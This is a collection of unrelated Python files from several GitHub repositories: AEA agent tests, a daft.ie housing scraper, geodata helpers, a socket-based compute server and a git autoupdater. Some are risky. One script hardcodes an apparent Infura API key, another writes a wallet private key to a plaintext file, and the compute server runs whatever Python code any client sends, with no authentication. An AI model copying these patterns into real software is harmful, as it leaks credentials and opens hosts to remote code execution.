msg = FIPAMessage((str(0), str(1)), 0, 0, FIPAMessage.Performative.PROPOSE, proposal=[])
msg_bytes = FIPASerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
msg = FIPAMessage((str(0), str(1)), 0, 0, FIPAMessage.Performative.ACCEPT)
msg_bytes = FIPASerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
msg = FIPAMessage((str(0), str(1)), 0, 0, FIPAMessage.Performative.DECLINE)
msg_bytes = FIPASerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = DefaultSerializer().decode(envelope.message)
assert envelope.protocol_id == "default"
assert msg.get("content") == b"hello"
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = FIPASerializer().decode(envelope.message)
assert envelope.protocol_id == "fipa"
assert msg.get("performative") == FIPAMessage.Performative.CFP
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = FIPASerializer().decode(envelope.message)
assert envelope.protocol_id == "fipa"
assert msg.get("performative") == FIPAMessage.Performative.PROPOSE
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = FIPASerializer().decode(envelope.message)
assert envelope.protocol_id == "fipa"
assert msg.get("performative") == FIPAMessage.Performative.ACCEPT
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = FIPASerializer().decode(envelope.message)
assert envelope.protocol_id == "fipa"
assert msg.get("performative") == FIPAMessage.Performative.DECLINE
multiplexer1.disconnect()
multiplexer2.disconnect()
@pytest.mark.asyncio
async def test_connecting_to_node_with_same_key():
"""Test that connecting twice with the same key works correctly."""
with LocalNode() as node:
public_key = "my_public_key"
my_queue = asyncio.Queue()
ret = await node.connect(public_key, my_queue)
assert ret is not None and isinstance(ret, asyncio.Queue)
ret = await node.connect(public_key, my_queue)
assert ret is None
```
#### File: tests/test_helpers/test_base.py
```python
import os
import sys
from aea.connections.oef.connection import OEFConnection
from aea.helpers.base import locate
from ..conftest import CUR_PATH
class TestHelpersBase:
"""Test the helper functions."""
def test_locate(self):
"""Test the locate function to locate modules."""
cwd = os.getcwd()
os.chdir(os.path.join(CUR_PATH, ".."))
sys.modules["gym_connection"] = locate("packages.connections.gym")
assert sys.modules['gym_connection'] is not None
sys.modules["gym_connection"] = locate("packages.connections.weather")
assert sys.modules['gym_connection'] is None
os.chdir(cwd)
def test_locate_class(self):
"""Test the locate function to locate classes."""
cwd = os.getcwd()
os.chdir(os.path.join(CUR_PATH, ".."))
expected_class = OEFConnection
actual_class = locate("aea.connections.oef.connection.OEFConnection")
# although they are the same class, they are different instances in memory
# and the build-in default "__eq__" method does not compare the attributes.
# so compare the names
assert actual_class is not None
assert expected_class.__name__ == actual_class.__name__
os.chdir(cwd)
def test_locate_with_builtins(self):
"""Test that locate function returns the built-in."""
result = locate("int.bit_length")
assert int.bit_length == result
def test_locate_when_path_does_not_exist(self):
"""Test that locate function returns None when the dotted path does not exist."""
result = locate("aea.not.existing.path")
assert result is None
result = locate("ThisClassDoesNotExist")
assert result is None
```
#### File: tests/test_protocols/test_oef_message.py
```python
from unittest import mock
from aea.protocols.oef.message import OEFMessage
from aea.protocols.oef.models import DataModel, Attribute, Query, Constraint, ConstraintType, Description
from aea.protocols.oef.serialization import OEFSerializer
def test_oef_type_string_value():
"""Test the string value of the type."""
assert str(OEFMessage.Type.REGISTER_SERVICE) == "register_service",\
"The string representation must be register_service"
assert str(OEFMessage.Type.UNREGISTER_SERVICE) == "unregister_service",\
"The string representation must be unregister_service"
assert str(OEFMessage.Type.REGISTER_AGENT) == "register_agent",\
"The string representation must be register_agent"
assert str(OEFMessage.Type.UNREGISTER_AGENT) == "unregister_agent",\
"The string representation must be unregister_agent"
assert str(OEFMessage.Type.SEARCH_SERVICES) == "search_services",\
"The string representation must be search_services"
assert str(OEFMessage.Type.SEARCH_AGENTS) == "search_agents",\
"The string representation must be search_agents"
assert str(OEFMessage.Type.OEF_ERROR) == "oef_error",\
"The string representation must be oef_error"
assert str(OEFMessage.Type.DIALOGUE_ERROR) == "dialogue_error",\
"The string representation must be dialogue_error"
assert str(OEFMessage.Type.SEARCH_RESULT) == "search_result",\
"The string representation must be search_result"
def test_oef_message_consistency():
"""Tests the consistency of an OEFMessage."""
foo_datamodel = DataModel("foo", [Attribute("bar", int,
True, "A bar attribute.")])
msg = OEFMessage(
oef_type=OEFMessage.Type.SEARCH_AGENTS,
id=2,
query=Query([Constraint("bar", ConstraintType("==", 1))], model=foo_datamodel)
)
assert msg.check_consistency(), "We expect the consistency to return TRUE"
with mock.patch("aea.protocols.oef.message.OEFMessage.Type")\
as mock_type_enum:
mock_type_enum.SEARCH_AGENTS.value = "unknown"
assert not msg.check_consistency(),\
"Expect the consistency to return False"
attribute_foo = Attribute("foo", int, True, "a foo attribute.")
attribute_bar = Attribute("bar", str, True, "a bar attribute.")
data_model_foobar = DataModel("foobar", [attribute_foo, attribute_bar], "A foobar data model.")
description_foobar = Description({"foo": 1, "bar": "baz"}, data_model=data_model_foobar)
msg = OEFMessage(oef_type=OEFMessage.Type.REGISTER_AGENT,
id=0,
agent_description=description_foobar,
agent_id="public_key")
assert msg.check_consistency()
msg = OEFMessage(oef_type=OEFMessage.Type.UNREGISTER_AGENT, id=0, agent_description=description_foobar,
agent_id="public_key")
assert msg.check_consistency()
def test_oef_message_oef_error():
"""Tests the OEF_ERROR type of message."""
msg = OEFMessage(oef_type=OEFMessage.Type.OEF_ERROR, id=0,
operation=OEFMessage.OEFErrorOperation.SEARCH_AGENTS)
assert OEFMessage(oef_type=OEFMessage.Type.OEF_ERROR, id=0,
operation=OEFMessage.OEFErrorOperation.SEARCH_AGENTS),\
"Expects an oef message Error!"
msg_bytes = OEFSerializer().encode(msg)
assert len(msg_bytes) > 0,\
"Expects the length of bytes not to be Empty"
deserialized_msg = OEFSerializer().decode(msg_bytes)
assert msg == deserialized_msg,\
"Expected the deserialized_msg to me equals to msg"
def test_oef_message_DialogeError():
"""Tests the OEFMEssage of type DialogueError."""
assert OEFMessage(oef_type=OEFMessage.Type.DIALOGUE_ERROR,
id=0,
dialogue_id=1,
origin="myKey"),\
"Could not create the message of type DialogueError"
```
#### File: agents-aea/tests/test_registries.py
```python
import os
import random
import shutil
import tempfile
import unittest.mock
from pathlib import Path
import yaml
import aea
import aea.registries.base
from aea.aea import AEA
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE
from aea.crypto.ledger_apis import LedgerApis
from aea.crypto.wallet import Wallet
from aea.decision_maker.messages.transaction import TransactionMessage
from aea.protocols.base import Protocol
from aea.registries.base import ProtocolRegistry, Resources
from .conftest import CUR_PATH, DummyConnection
class TestProtocolRegistry:
"""Test the protocol registry."""
@classmethod
def setup_class(cls):
"""Set the tests up."""
cls.patch = unittest.mock.patch.object(aea.registries.base.logger, 'exception')
cls.mocked_logger = cls.patch.__enter__()
cls.oldcwd = os.getcwd()
cls.agent_name = "agent_dir_test"
cls.t = tempfile.mkdtemp()
cls.agent_folder = os.path.join(cls.t, cls.agent_name)
shutil.copytree(os.path.join(CUR_PATH, "data", "dummy_aea"), cls.agent_folder)
os.chdir(cls.agent_folder)
# make fake protocol
cls.fake_protocol_id = "fake"
agent_config_path = Path(cls.agent_folder, DEFAULT_AEA_CONFIG_FILE)
agent_config = yaml.safe_load(agent_config_path.read_text())
agent_config.get("protocols").append(cls.fake_protocol_id)
yaml.safe_dump(agent_config, open(agent_config_path, "w"))
Path(cls.agent_folder, "protocols", cls.fake_protocol_id).mkdir()
cls.registry = ProtocolRegistry()
cls.registry.populate(cls.agent_folder)
cls.expected_protocol_ids = {"default", "fipa"}
def test_not_able_to_add_bad_formatted_protocol_message(self):
"""Test that the protocol registry has not been able to add the protocol 'bad'."""
self.mocked_logger.assert_called_with("Not able to add protocol {}.".format(self.fake_protocol_id))
def test_fetch_all(self):
"""Test that the 'fetch_all' method works as expected."""
protocols = self.registry.fetch_all()
assert all(isinstance(p, Protocol) for p in protocols)
assert set(p.id for p in protocols) == self.expected_protocol_ids
def test_unregister(self):
"""Test that the 'unregister' method works as expected."""
protocol_id_removed = "default"
protocol_removed = self.registry.fetch(protocol_id_removed)
self.registry.unregister(protocol_id_removed)
expected_protocols_ids = set(self.expected_protocol_ids)
expected_protocols_ids.remove(protocol_id_removed)
assert set(p.id for p in self.registry.fetch_all()) == expected_protocols_ids
# restore the protocol
self.registry.register((protocol_id_removed, None), protocol_removed)
@classmethod
def teardown_class(cls):
"""Tear down the tests."""
cls.mocked_logger.__exit__()
shutil.rmtree(cls.t, ignore_errors=True)
os.chdir(cls.oldcwd)
class TestResources:
"""Test the resources class."""
@classmethod
def _patch_logger(cls):
cls.patch_logger_exception = unittest.mock.patch.object(aea.registries.base.logger, 'exception')
cls.mocked_logger_exception = cls.patch_logger_exception.__enter__()
cls.patch_logger_warning = unittest.mock.patch.object(aea.registries.base.logger, 'warning')
cls.mocked_logger_warning = cls.patch_logger_warning.__enter__()
@classmethod
def _unpatch_logger(cls):
cls.mocked_logger_exception.__exit__()
cls.mocked_logger_warning.__exit__()
@classmethod
def setup_class(cls):
"""Set the tests up."""
cls._patch_logger()
# create temp agent folder
cls.oldcwd = os.getcwd()
cls.agent_name = "agent_test" + str(random.randint(0, 1000))
cls.t = tempfile.mkdtemp()
cls.agent_folder = os.path.join(cls.t, cls.agent_name)
shutil.copytree(os.path.join(CUR_PATH, "data", "dummy_aea"), cls.agent_folder)
os.chdir(cls.agent_folder)
# make fake skill
cls.fake_skill_id = "fake"
agent_config_path = Path(cls.agent_folder, DEFAULT_AEA_CONFIG_FILE)
agent_config = yaml.safe_load(agent_config_path.read_text())
agent_config.get("skills").append(cls.fake_skill_id)
yaml.safe_dump(agent_config, open(agent_config_path, "w"))
Path(cls.agent_folder, "skills", cls.fake_skill_id).mkdir()
connections = [DummyConnection()]
private_key_pem_path = os.path.join(CUR_PATH, "data", "priv.pem")
wallet = Wallet({'default': private_key_pem_path})
ledger_apis = LedgerApis({})
cls.resources = Resources(os.path.join(cls.agent_folder))
cls.aea = AEA(cls.agent_name, connections, wallet, ledger_apis, resources=cls.resources)
cls.resources.load(cls.aea.context)
cls.expected_skills = {"dummy", "error"}
def test_unregister_handler(self):
"""Test that the unregister of handlers work correctly."""
assert len(self.resources.handler_registry.fetch_all()) == 3
error_handler = self.resources.handler_registry.fetch_by_skill("default", "error")
self.resources.handler_registry.unregister("error")
# unregister the handler and test that it has been actually unregistered.
assert self.resources.handler_registry.fetch_by_skill("default", "error") is None
handlers = self.resources.handler_registry.fetch_all()
assert len(handlers) == 2
assert handlers[0].__class__.__name__ == "DummyHandler"
dummy_handler = self.resources.handler_registry.fetch_by_skill("default", "dummy")
self.resources.handler_registry.unregister("dummy")
assert len(self.resources.handler_registry.fetch_all()) == 0
# restore the handlers
self.resources.handler_registry.register((None, "error"), [error_handler])
self.resources.handler_registry.register((None, "dummy"), [dummy_handler])
assert len(self.resources.handler_registry.fetch_all()) == 2
def test_fake_skill_loading_failed(self):
"""Test that when the skill is bad formatted, we print a log message."""
s = "A problem occurred while parsing the skill directory {}. Exception: {}".format(
os.path.join(self.agent_folder, "skills", "fake"),
"[Errno 2] No such file or directory: '" + os.path.join(self.agent_folder, "skills", "fake", "skill.yaml") + "'")
self.mocked_logger_warning.assert_called_once_with(s)
def test_remove_skill(self):
"""Test that the 'remove skill' method works correctly."""
error_skill = self.resources.get_skill("error")
self.resources.remove_skill("error")
assert self.resources.get_skill("error") is None
self.resources.add_skill(error_skill)
assert self.resources.get_skill("error") == error_skill
def test_register_behaviour_with_already_existing_skill_id(self):
"""Test that registering a behaviour with an already existing skill id behaves as expected."""
self.resources.behaviour_registry.register((None, "error"), [])
self.mocked_logger_warning.assert_called_with("Behaviours already registered with skill id 'error'")
def test_behaviour_registry(self):
"""Test that the behaviour registry behaves as expected."""
assert len(self.resources.behaviour_registry.fetch_all()) == 1
dummy_behaviours = self.resources.behaviour_registry.fetch("dummy")
self.resources.behaviour_registry.unregister("dummy")
assert self.resources.behaviour_registry.fetch("dummy") is None
self.resources.behaviour_registry.register((None, "dummy"), dummy_behaviours)
def test_register_task_with_already_existing_skill_id(self):
"""Test that registering a task with an already existing skill id behaves as expected."""
self.resources.task_registry.register((None, "error"), [])
self.mocked_logger_warning.assert_called_with("Tasks already registered with skill id 'error'")
def test_task_registry(self):
"""Test that the task registry behaves as expected."""
assert len(self.resources.task_registry.fetch_all()) == 1
dummy_tasks = self.resources.task_registry.fetch("dummy")
self.resources.task_registry.unregister("dummy")
assert self.resources.task_registry.fetch("dummy") is None
self.resources.task_registry.register((None, "dummy"), dummy_tasks)
def test_skill_loading(self):
"""Test that the skills have been loaded correctly."""
dummy_skill = self.resources.get_skill("dummy")
error_skill_context = dummy_skill.skill_context
handlers = dummy_skill.handlers
behaviours = dummy_skill.behaviours
tasks = dummy_skill.tasks
shared_classes = dummy_skill.shared_classes
assert handlers == error_skill_context.handlers
assert behaviours == error_skill_context.behaviours
assert tasks == error_skill_context.tasks
assert getattr(error_skill_context, "agent_name") == self.agent_name
assert handlers[0].context == dummy_skill.skill_context
assert behaviours[0].context == dummy_skill.skill_context
assert tasks[0].context == dummy_skill.skill_context
assert shared_classes[0].context == dummy_skill.skill_context
def test_handler_configuration_loading(self):
"""Test that the handler configurations are loaded correctly."""
default_handlers = self.resources.handler_registry.fetch("default")
assert len(default_handlers) == 2
handler1, handler2 = default_handlers[0], default_handlers[1]
dummy_handler = handler1 if handler1.__class__.__name__ == "DummyHandler" else handler2
assert dummy_handler.config == {
"handler_arg_1": 1,
"handler_arg_2": "2"
}
def test_behaviour_configuration_loading(self):
"""Test that the behaviour configurations are loaded correctly."""
dummy_behaviours = self.resources.behaviour_registry.fetch("dummy")
assert len(dummy_behaviours) == 1
dummy_behaviour = dummy_behaviours[0]
assert dummy_behaviour.config == {
"behaviour_arg_1": 1,
"behaviour_arg_2": "2"
}
def test_task_configuration_loading(self):
"""Test that the task configurations are loaded correctly."""
dummy_tasks = self.resources.task_registry.fetch("dummy")
assert len(dummy_tasks) == 1
dummy_task = dummy_tasks[0]
assert dummy_task.config == {
"task_arg_1": 1,
"task_arg_2": "2"
}
def test_shared_class_configuration_loading(self):
"""Test that the shared class configurations are loaded correctly."""
dummy_skill = self.resources.get_skill("dummy")
assert len(dummy_skill.shared_classes) == 1
dummy_shared_class = dummy_skill.shared_classes[0]
assert dummy_shared_class.config == {
"shared_class_arg_1": 1,
"shared_class_arg_2": "2"
}
@classmethod
def teardown_class(cls):
"""Tear the tests down."""
cls._unpatch_logger()
shutil.rmtree(cls.t, ignore_errors=True)
os.chdir(cls.oldcwd)
class TestFilter:
"""Test the resources class."""
@classmethod
def setup_class(cls):
"""Set the tests up."""
# create temp agent folder
cls.oldcwd = os.getcwd()
cls.agent_name = "agent_test" + str(random.randint(0, 1000))
cls.t = tempfile.mkdtemp()
cls.agent_folder = os.path.join(cls.t, cls.agent_name)
shutil.copytree(os.path.join(CUR_PATH, "data", "dummy_aea"), cls.agent_folder)
os.chdir(cls.agent_folder)
connections = [DummyConnection()]
private_key_pem_path = os.path.join(CUR_PATH, "data", "priv.pem")
wallet = Wallet({'default': private_key_pem_path})
ledger_apis = LedgerApis({})
cls.aea = AEA(cls.agent_name, connections, wallet, ledger_apis, resources=Resources(cls.agent_folder))
def test_handle_internal_messages(self):
"""Test that the internal messages are handled."""
self.aea.setup()
t = TransactionMessage(performative=TransactionMessage.Performative.ACCEPT,
skill_id="dummy",
transaction_id="transaction0",
sender="pk1",
counterparty="pk2",
is_sender_buyer=True,
currency_pbk="Unknown",
amount=2,
sender_tx_fee=0,
counterparty_tx_fee=0,
quantities_by_good_pbk={"Unknown": 10})
self.aea.decision_maker.message_out_queue.put(t)
self.aea.filter.handle_internal_messages()
internal_handler = self.aea.resources.handler_registry.fetch_by_skill("internal", "dummy")
assert len(internal_handler.handled_internal_messages) == 1
@classmethod
def teardown_class(cls):
"""Tear the tests down."""
shutil.rmtree(cls.t, ignore_errors=True)
os.chdir(cls.oldcwd)
``` |
{
"source": "8ball030/AutonomousHegician",
"score": 2
} |
#### File: agents/scripts/update_ah_with_ledger_connection.py
```python
import contextlib
import os
from typing import Tuple
@contextlib.contextmanager
def cd(path):
"""Change directory with context manager."""
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
os.chdir(old_cwd)
except Exception as e: # pylint: disable=broad-except # pragma: nocover
os.chdir(old_cwd)
raise e from e
connection_strings = {
"ganache_local": "http://localhost:7545",
"ganache_container": "http://ganachecli:7545",
"live": "https://mainnet.infura.io/v3/f00f7b3ba0e848ddbdc8941c527447fe", # todo
}
def parse_args():
def is_acceptable_input(input_):
acceptable = list(connection_strings.values())
if input_ in acceptable:
return input_
else:
raise ValueError(
f"{input_} is not a valid option. Must be one of {acceptable}"
)
var = os.environ.get("LEDGER")
return is_acceptable_input(var)
def update_ah_config_with_new_config(
ledger_string,
file_paths: Tuple[str, ...] = (
"./autonomous_hegician",
"./hegic_deployer",
),
):
"""Get the AH config and update it with ledger string."""
for file_path in file_paths:
with cd(file_path):
os.system(
f"aea -s config set vendor.fetchai.connections.ledger.config.ledger_apis.ethereum.address {ledger_string}"
)
def do_work():
"""Run the script."""
ledger_string = parse_args()
update_ah_config_with_new_config(
ledger_string,
)
print("Configurations copied.")
if __name__ == "__main__":
do_work()
``` |
{
"source": "8ball030/sushi-farmer",
"score": 3
} |
#### File: sushi-farmer/scripts/create_key.py
```python
import eth_account
def main():
a = eth_account.Account()
a.enable_unaudited_hdwallet_features()
in_ = input("Please paste your 24 key backup phrase!\n")
local_account = a.from_mnemonic(in_)
with open("ethereum_private_key.txt", "w") as f:
f.write(str(local_account.privateKey.hex()))
print(f"Written key to file.")
if __name__ == "__main__":
main()
``` |
{
"source": "8ballbb/scrape_housing_sites",
"score": 2
} |
#### File: scrape_housing_sites/housing/listings.py
```python
from .utils import error_handler
from datetime import datetime
import json
from time import sleep
import re
import requests
from tqdm import tqdm
PAYLOAD = {
"section": "residential-for-sale",
"filters": [
{
"name": "adState",
"values": ["published"]
},
{
"values": ["houses"],
"name": "propertyType"
}
],
"andFilters": [],
"ranges": [],
"paging": {
"from": "0",
"pageSize": "50"
},
"geoFilter": {
"storedShapeIds": ["1", "3", "2", "4"],
"geoSearchType": "STORED_SHAPES"
},
"terms": "",
"sort": "publishDateDesc"
}
def get_price(listing: dict) -> int:
"""Get property price"""
try:
return int(re.sub("\D", "", listing["price"]))
except ValueError:
return "POA"
def get_bed(listing: dict) -> int:
try:
return int(listing["numBedrooms"].lower().replace(" bed", ""))
except ValueError:
if "&" in listing["numBedrooms"]:
return int(max(
listing["numBedrooms"].lower().replace(" bed", "").split(" & ")))
def get_bath(listing: dict) -> int:
return int(listing["numBathrooms"].lower().replace(" bath", ""))
def get_ber(listing: dict) -> str:
return listing["ber"]["rating"]
def get_floor_area(listing: dict) -> float:
return float(listing["floorArea"]["value"])
def get_floor_area_unit(listing: dict) -> str:
return listing["floorArea"]["unit"]
def get_property_type(listing: dict) -> str:
return listing["propertyType"]
def get_estate_agent(listing: dict) -> str:
estate_agents = [
"<NAME>", "DNG", "<NAME>",
"Flynn & Associates Ltd", "Lisney", "Quillsen" ,"REA",
"Hunters Estate Agent", "<NAME>",
"<NAME>", "PropertyTeam", "RE/MAX", "<NAME>",
"Mason Estates", "Savills", "Property Partners"
]
for ea in estate_agents:
if ea in listing["seller"]["branch"]:
listing["seller"]["branch"] = ea
break
return listing["seller"]["branch"]
def get_lng(listing: dict) -> float:
return listing["point"]["coordinates"][0]
def get_lat(listing: dict) -> float:
return listing["point"]["coordinates"][1]
def get_listing_date(listing: dict) -> str:
"""Milliseconds since epoch"""
try:
return datetime.fromtimestamp(
listing["publishData"]/1000).strftime("%Y-%m-%d")
except KeyError:
return datetime.now().strftime('%Y-%m-%d')
def get_listing_data(listing):
listing_data = dict(
daft_id=listing["id"],
url=f"https://www.daft.ie{listing['seoFriendlyPath']}",
address=listing["title"],
price=error_handler(get_price, listing),
beds=error_handler(get_bed, listing),
baths=error_handler(get_bath, listing),
property_type=error_handler(get_property_type, listing),
estate_agent=error_handler(get_estate_agent, listing),
ber=error_handler(get_ber, listing),
floor_area=error_handler(get_floor_area, listing),
floor_area_unit=error_handler(get_floor_area_unit, listing),
lng=error_handler(get_lng, listing),
lat=error_handler(get_lat, listing),
publish_date=get_listing_date(listing)
)
return listing_data
def get_total_pages(headers) -> int:
"""Get number of pages to scrape"""
response = requests.request(
"POST", "https://gateway.daft.ie/old/v1/listings",
headers=headers,
data=json.dumps(PAYLOAD))
results = json.loads(response.content)
return results["paging"]["totalPages"]
def scrape_listing_pages(headers: dict) -> list:
"""Scrape data from each listing"""
total_pages = get_total_pages(headers) # get number of pages with listings
for _ in tqdm(range(total_pages)):
response = requests.request(
"POST", "https://gateway.daft.ie/old/v1/listings",
headers=headers,
data=json.dumps(PAYLOAD))
if response.status_code == 200:
listings = json.loads(response.content)["listings"]
for listing in listings:
yield get_listing_data(listing["listing"])
# Set page number
PAYLOAD["paging"]["from"] = (
int(PAYLOAD["paging"]["from"]) + int(PAYLOAD["paging"]["pageSize"]))
sleep(2)
```
#### File: scrape_housing_sites/housing/osi.py
```python
from typing import Union, Iterable
from functools import partial
import geopandas as gpd
def get_location_info(df):
df = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df["lng"], df["lat"]))
df_small_area = get_small_area_data()
df_constituency = get_constituency_data()
df_electoral = get_electoral_data()
df_local_electoral = get_local_electoral_data()
osi_info = partial(
get_osi_info,
df_small_area=df_small_area,
df_constituency=df_constituency,
df_electoral=df_electoral,
df_local_electoral=df_local_electoral)
df["county_name"], df["small_area"], df["constituency"], df["province"], df["local_electoral"], df["county"] = zip(
*df["geometry"].apply(osi_info))
return df
def get_osi_info(
point,
df_small_area: gpd.geodataframe.GeoDataFrame,
df_constituency: gpd.geodataframe.GeoDataFrame,
df_electoral: gpd.geodataframe.GeoDataFrame,
df_local_electoral: gpd.geodataframe.GeoDataFrame):
county_area, area = get_small_area_info(df_small_area, point)
constituency = get_constituency_info(df_constituency, point)
_, province = get_electoral_info(df_electoral, point)
electoral_local, county = get_local_electoral_info(df_local_electoral, point)
return county_area, area, constituency, province, electoral_local, county
def get_small_area_info(
df_small_area: gpd.geodataframe.GeoDataFrame, point) -> Iterable:
"""TODO: Refactor required"""
small_area_filter = df_small_area["geometry"].contains(point)
small_areas = df_small_area.loc[small_area_filter]
if len(small_areas) > 1 or len(small_areas) == 0:
area, county_area = None, None
else:
area = small_areas["EDNAME"].iloc[0]
county_area = small_areas["COUNTYNAME"].iloc[0]
return county_area, area
def get_constituency_info(
df_constituency: gpd.geodataframe.GeoDataFrame, point) -> Union[str, None]:
"""TODO: Refactor required"""
constituency_filter = df_constituency["geometry"].contains(point)
constituencies = df_constituency.loc[constituency_filter]
if len(constituencies) > 1 or len(constituencies) == 0:
constituency = None
else:
constituency = constituencies["constituency"].iloc[0]
return constituency
def get_electoral_info(
df_electoral: gpd.geodataframe.GeoDataFrame, point) -> Union[str, None]:
"""TODO: Refactor required"""
electoral_filter = df_electoral["geometry"].contains(point)
electoral_divisions = df_electoral.loc[electoral_filter]
if len(electoral_divisions) > 1 or len(electoral_divisions) == 0:
electoral_div, province = None, None
else:
electoral_div = electoral_divisions["CSOED_34_1"].iloc[0]
province = electoral_divisions["PROVINCE"].iloc[0]
return electoral_div, province
def get_local_electoral_info(df_local_electoral: gpd.geodataframe.GeoDataFrame, point) -> Union[str, None]:
"""TODO: Refactor required"""
electoral_filter = df_local_electoral["geometry"].contains(point)
local_electorals = df_local_electoral.loc[electoral_filter]
if len(local_electorals) > 1 or len(local_electorals) == 0:
electoral_local, county = None, None
else:
electoral_local = local_electorals["local_electoral"].iloc[0]
county = local_electorals["COUNTY"].iloc[0]
return electoral_local, county
def get_small_area_data() -> gpd.geodataframe.GeoDataFrame:
"""TODO: write docstring"""
shp_data = "housing/osi_data/Small_Areas_Ungeneralised_-_OSi_National_Statistical_Boundaries_-_2015-shp/"
df_small_area = gpd.read_file(shp_data)
df_small_area = df_small_area.loc[:, ["COUNTYNAME", "EDNAME", "geometry"]]
df_small_area = df_small_area.to_crs(epsg=4326)
return df_small_area
def get_constituency_data() -> gpd.geodataframe.GeoDataFrame:
"""TODO: write docstring"""
shp_data = "housing/osi_data/Constituency_Boundaries_Ungeneralised_-_OSi_National_Electoral_Boundaries_-_2017/"
df_constituency = gpd.read_file(shp_data)
df_constituency = df_constituency.to_crs(epsg=4326)
df_constituency["constituency"] = df_constituency["CON_SEAT_"].str.replace(r"(.+) \(\d\)", r"\1", regex=True)
df_constituency = df_constituency.loc[:, ["constituency", "geometry"]]
return df_constituency
def get_electoral_data() -> gpd.geodataframe.GeoDataFrame:
"""TODO: write docstring"""
shp_data = "housing/osi_data/CSO_Electoral_Divisions_Ungeneralised_-_OSi_National_Statistical_Boundaries_-_2015-shp/"
df_electoral = gpd.read_file(shp_data)
df_electoral = df_electoral.to_crs(epsg=4326)
df_electoral = df_electoral.loc[:, ["CSOED_34_1", "PROVINCE", "geometry"]]
return df_electoral
def get_local_electoral_data() -> gpd.geodataframe.GeoDataFrame:
"""TODO: write docstring"""
shp_data = "housing/osi_data/Local_Electoral_Areas_-_OSi_National_Statutory_Boundaries-shp/"
df_local_electoral = gpd.read_file(shp_data)
df_local_electoral = df_local_electoral.to_crs(epsg=4326)
df_local_electoral = df_local_electoral.loc[:, ["COUNTY", "ENGLISH", "geometry"]]
df_local_electoral["local_electoral"] = (df_local_electoral["ENGLISH"]
.str.replace(r"( LEA-\d|-LEA-\d)", "", regex=True)
.str.title())
df_local_electoral["COUNTY"] = df_local_electoral["COUNTY"].str.title()
return df_local_electoral
``` |
{
"source": "8Banana/dotfiles",
"score": 2
} |
#### File: multicomputering/multicomputering/multicomputering_server.py
```python
import os
import pathlib
import shutil
import stat
import sys
import time
import types
from enum import Enum, auto
import importlib.util
import socket
import json
from multicomputering import Packer
class WorkerStates(Enum):
Listening = auto()
Connecting = auto()
PreparingWork = auto()
Working = auto()
class ComputerWorker:
_GUID_SEP = '0x27177c1797dc03ee853922f411bdf83f55e9ed2dcd953a4369f9b1a454e60fa0'.encode('utf-8')
def __init__(self, sock):
self.state = WorkerStates.Listening
self.sock = sock
self.workspace = {}
self._loc = None
self._packages_loc = None
self.results = {}
def ready_filesys(self, loc):
self._loc = os.path.dirname(os.path.abspath(__file__))
self._packages_loc = os.path.join(
self._loc, '..', '.multicomputering_packages_' + str(id(self)))
sys.path.append(loc or self._packages_loc)
pathlib.Path(self._packages_loc).mkdir(parents=True, exist_ok=True)
def clean_up_filesys(self):
shutil.rmtree(self._packages_loc, onerror=self.remove_readonly)
def start(self, loc=None):
self.ready_filesys(loc)
print('doing task :)')
self.recv_init()
self.recv_code()
self.recv_data()
self.wait_for_pulse()
self.run()
print('Done!')
self.clean_up_filesys()
self.disconnect()
def recv_init(self):
pass
def recv_code(self, *args):
data = self.recv()
data = json.loads(data.decode('utf-8'))
for module_name, contents in data.items():
Packer.write_package(self._packages_loc, module_name, contents)
self.workspace[module_name] = contents
self.pulse()
def recv_data(self, *args):
data = self.recv()
data = json.loads(data.decode('utf-8'))
Packer.write_data(
self._packages_loc, '_remote_data', data)
self.pulse()
def reflect(self):
pass
def clear_callables(self):
pass
def run(self):
py_obj = importlib.util.spec_from_file_location(
'main', os.path.join(
self._packages_loc, 'main' + '.py'))
module = importlib.util.module_from_spec(py_obj)
py_obj.loader.exec_module(module)
result = module.main()
self.send(result.encode('utf-8'))
def disconnect(self):
self.sock.close()
raise SystemExit(0)
def send(self, *args, **kwargs):
self.sock.sendall(*args, **kwargs)
def recv(self):
buffer = bytearray()
while True:
buffer += self.sock.recv(4096)
if len(buffer) >= 64:
bytes_target = int.from_bytes(buffer[:64], 'big')
buffer = buffer[64:]
break
while len(buffer) != bytes_target:
buffer += self.sock.recv(4096)
return buffer
def pulse(self):
self.send(b'wololoo')
def wait_for_pulse(self):
p = self.recv()
assert(p == b'wololoo')
@staticmethod
def remove_readonly(func, path, _):
print(path)
"Clear the readonly bit and reattempt the removal"
os.chmod(path, stat.S_IWRITE)
func(path)
def handler(sock, addr):
pc = ComputerWorker(sock)
try:
pc.start()
except KeyboardInterrupt as e:
pc.clean_up_filesys()
raise e
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', int(sys.argv[1])))
sock.listen(5)
while True:
(clientsock, address) = sock.accept()
print("Got client!", address)
handler(clientsock, address)
if __name__ == '__main__':
main()
``` |
{
"source": "8Banana/pythonbot",
"score": 2
} |
#### File: 8Banana/pythonbot/autoupdater.py
```python
import atexit
import inspect
import os
import subprocess
import sys
import threading
# This interval is 10 minutes because it's fun to see your updates come out
# when you want them to.
INTERVAL = int(1 * 60 * 10) # seconds
update_condition = threading.Condition()
filepath = None
def _get_output(args):
process = subprocess.run(args,
stdout=subprocess.PIPE)
assert process.returncode == 0
return process.stdout.decode("ascii").strip()
def _worker():
remote = "origin"
branch = _get_output(["git", "symbolic-ref", "--short", "HEAD"])
commit_hash = _get_output(["git", "rev-parse", "HEAD"])
while True:
command = subprocess.run(["git", "pull", remote, branch],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if command.returncode == 0:
new_commit_hash = _get_output(["git", "rev-parse", "HEAD"])
